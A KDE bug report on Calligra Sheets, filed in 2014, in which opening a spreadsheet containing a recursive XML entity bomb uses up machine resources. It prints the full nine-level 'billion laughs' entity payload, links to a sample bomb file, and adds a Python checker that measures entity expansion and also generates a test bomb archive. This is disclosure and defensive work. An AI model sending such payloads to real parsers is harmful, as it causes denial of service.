Bug 331869 - SECURITY: XML Bombs can cause Calligra Sheets to consume excessive machine resources
Status: RESOLVED WORKSFORME
Alias: None
Product: calligrasheets
Classification: Applications
Component: general (other bugs)
Version First Reported In: 2.7.4
Platform: Fedora RPMs Linux
Importance: NOR crash
Target Milestone: ---
Assignee: Calligra Sheets (KSpread) Bugs
URL: http://search.cpan.org/src/DDICK/Spre...
Reported: 2014-03-08 06:01 UTC by David Dick
Modified: 2020-12-14 02:00 UTC

Description David Dick 2014-03-08 06:01:02 UTC
The referenced maindoc.ksp contains the following entries:

* documentinfo.xml
* maindoc.xml
* mimetype
* preview.png

The maindoc.xml file contains the following entity definitions.  

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<spreadsheet xmlns="http://www.calligra.org/DTD/tables" syntaxVersion="1" mime="application/x-kspread" editor="Calligra Sheets">

The entity &lol9; is then included in the body of the spreadsheet.

This is a standard recursive entity attack as per http://cwe.mitre.org/data/definitions/776.html

I filed a similar bug in Red Hat's bugzilla as https://bugzilla.redhat.com/show_bug.cgi?id=1046440

Reproducible: Always

Steps to Reproduce:
1. Point browser at http://search.cpan.org/src/DDICK/Spreadsheet-CSV-0.07/t/data/bombs/maindoc.ksp
2. Click OK to open file in Calligra Sheets
3. Watch as Calligra Sheets consumes machine resources processing the external entities inserted in it

Actual Results:
Calligra Sheets consumes excessive machine resources

Expected Results:  
Calligra Sheets should at a minimum refuse to open a file that it detects has defined entities.
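
Added example, not part of the original report and not Calligra's code: a pre-parse check in the spirit of the expected result above, which reads maindoc.xml from the archive and computes how large the text would become after entity expansion without ever expanding it. It goes one step beyond refusing every file that defines entities by rejecting only above a size limit and on recursive definitions. The function names, the 10 MB limit and the sample archive are assumptions made for illustration, and only internal general entities are handled.

```python
import io
import re
import zipfile

DOCTYPE = re.compile(rb"<!DOCTYPE[^\[>]*(\[.*?\]\s*)?>", re.S)
ENTITY_DECL = re.compile(rb"<!ENTITY\s+([^\s%\"']+)\s+([\"'])(.*?)\2\s*>", re.S)
ENTITY_REF = re.compile(rb"&([^#;&\s]+);")

def expanded_size(xml: bytes) -> int:
    """Byte size after expanding internal general entities, computed without expanding."""
    decls, sizes, active = {}, {}, set()
    for m in ENTITY_DECL.finditer(xml):
        decls.setdefault(m.group(1), m.group(3))  # first declaration wins, as in XML
    def measure(text: bytes) -> int:
        total = len(text)
        for ref in ENTITY_REF.finditer(text):
            if ref.group(1) in decls:  # swap the reference's length for its expansion's
                total += size_of(ref.group(1)) - len(ref.group(0))
        return total
    def size_of(name: bytes) -> int:
        if name in active:  # entity reached again while still being measured
            raise ValueError("recursive entity: " + name.decode(errors="replace"))
        if name not in sizes:
            active.add(name)
            sizes[name] = measure(decls[name])  # memoised, so the work stays linear
            active.discard(name)
        return sizes[name]
    return measure(DOCTYPE.sub(b"", xml, count=1))

def check_ksp(data: bytes, limit: int = 10_000_000) -> int:
    """Return the expanded size of maindoc.xml, or raise ValueError to refuse the file."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        xml = z.read("maindoc.xml")
    try:
        size = expanded_size(xml)
    except RecursionError:  # a very long entity chain is refused as well
        raise ValueError("entity nesting too deep") from None
    if size > limit:  # limit is an assumed policy value, not taken from Calligra
        raise ValueError(f"entities expand to {size} bytes, limit is {limit}")
    return size

def sample_ksp(depth: int = 9) -> bytes:
    """Constructed archive with the report's entity shape (not the original file)."""
    decls = ['<!ENTITY lol "lol">'] + ['<!ENTITY lol%d "%s">' % (
        i, "&lol%s;" % ("" if i == 2 else i - 1) * 10) for i in range(2, depth + 1)]
    xml = ('<?xml version="1.0" encoding="UTF-8"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
           + "\n]>\n<spreadsheet>&lol%d;</spreadsheet>" % depth)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("maindoc.xml", xml)
    return buf.getvalue()
```

With the nine entity levels shown in the report, an archive of about a kilobyte measures at roughly 300 MB of expanded text, so `check_ksp(sample_ksp())` raises `ValueError`.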
Comment 1 Rex Dieter 2014-03-08 17:44:53 UTC
I can reproduce given the sample docs.
Comment 2 Justin Zobel 2020-12-14 01:27:17 UTC
Thank you for the crash report, David.

As it has been a while since this was reported, can you please test and confirm if this issue is still occurring or if this bug report can be marked as resolved?

I have set the bug status to "needsinfo" pending your response. Please change back to "reported" or "resolved/worksforme" when you respond. Thank you.
Comment 3 David Dick 2020-12-14 02:00:13 UTC
My Fedora supplied Calligra Sheets no longer consumes large amounts of memory when it opens the supplied URL.